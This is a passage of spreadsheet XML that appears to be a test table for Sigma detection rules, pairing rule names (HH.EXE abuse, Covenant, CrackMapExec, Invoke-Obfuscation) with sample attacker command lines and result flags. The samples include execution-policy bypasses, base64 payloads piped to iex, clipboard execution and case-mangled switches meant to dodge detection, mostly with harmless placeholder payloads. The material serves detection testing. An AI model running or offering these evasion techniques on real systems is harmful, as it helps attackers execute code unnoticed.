          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="36" t="n"/>
      <c r="J205" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K205" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C206" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D206" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E206" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="36" t="n"/>
      <c r="J206" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K206" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="n"/>
      <c r="B207" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C207" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D207" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E207" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="43" t="n"/>
      <c r="J207" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C208" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D208" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E208" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -W H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="43" t="n"/>
      <c r="J208" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="n"/>
      <c r="B209" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C209" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D209" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E209" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop /"W" H -st $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="43" t="n"/>
      <c r="J209" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C210" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D210" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E210" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -executIONpolicY Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="n"/>
      <c r="B211" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C211" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D211" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E211" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -NOprofilE /"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="43" t="n"/>
      <c r="J211" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C212" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D212" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E212" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUtiOnpOLIcy Bypass -nop -w H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="43" t="n"/>
      <c r="J212" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C213" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D213" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E213" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTioNPOLICy Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="43" t="n"/>
      <c r="J213" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C214" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D214" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E214" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTiOnpOliCy Bypass /"NoProfile" -"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="43" t="n"/>
      <c r="J214" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C215" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D215" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E215" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -W H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="n"/>
      <c r="B216" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C216" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D216" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E216" s="36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F216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="36" t="n"/>
      <c r="J216" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="n"/>
      <c r="B217" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C217" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D217" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E217" s="36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217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="36" t="n"/>
      <c r="J217" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="n"/>
      <c r="B218" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C218" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D218" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E218" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="n"/>
      <c r="B219" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C219" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D219" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E219" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="43" t="n"/>
      <c r="J219" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="n"/>
      <c r="B220" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C220" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D220" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E220" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="43" t="n"/>
      <c r="J220" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="n"/>
      <c r="B221" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C221" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D221" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E221" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="43" t="n"/>
      <c r="J221" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K221" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="n"/>
      <c r="B222" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C222" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D222" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E222" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="43" t="n"/>
      <c r="J222" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K222" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="n"/>
      <c r="B223" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C223" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D223" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E223" s="36" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="36" t="n"/>
      <c r="J223" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K223" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="n"/>
      <c r="B224" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C224" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D224" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E224" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="36" t="n"/>
      <c r="J224" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K224" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="n"/>
      <c r="B225" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C225" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D225" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E225" s="36" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="43" t="n"/>
      <c r="J225" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K225" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="n"/>
      <c r="B226" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C226" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D226" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E226" s="36" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="36" t="n"/>
      <c r="J226" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K226" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C227" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D227" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E227" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="43" t="n"/>
      <c r="J227" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K227" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="n"/>
      <c r="B228" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C228" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D228" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E228" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -c "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="n"/>
      <c r="J228" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C229" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D229" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E229" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="n"/>
      <c r="J229" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C230" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D230" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E230" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="36" t="n"/>
      <c r="J230" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="n"/>
      <c r="B231" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C231" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D231" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E231" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="43" t="n"/>
      <c r="J231" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="n"/>
      <c r="B232" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C232" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D232" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E232" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="n"/>
      <c r="J232" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="n"/>
      <c r="B233" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C233" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D233" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E233" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F233" s="36" t="b">
        <v>0</v>
      </c>
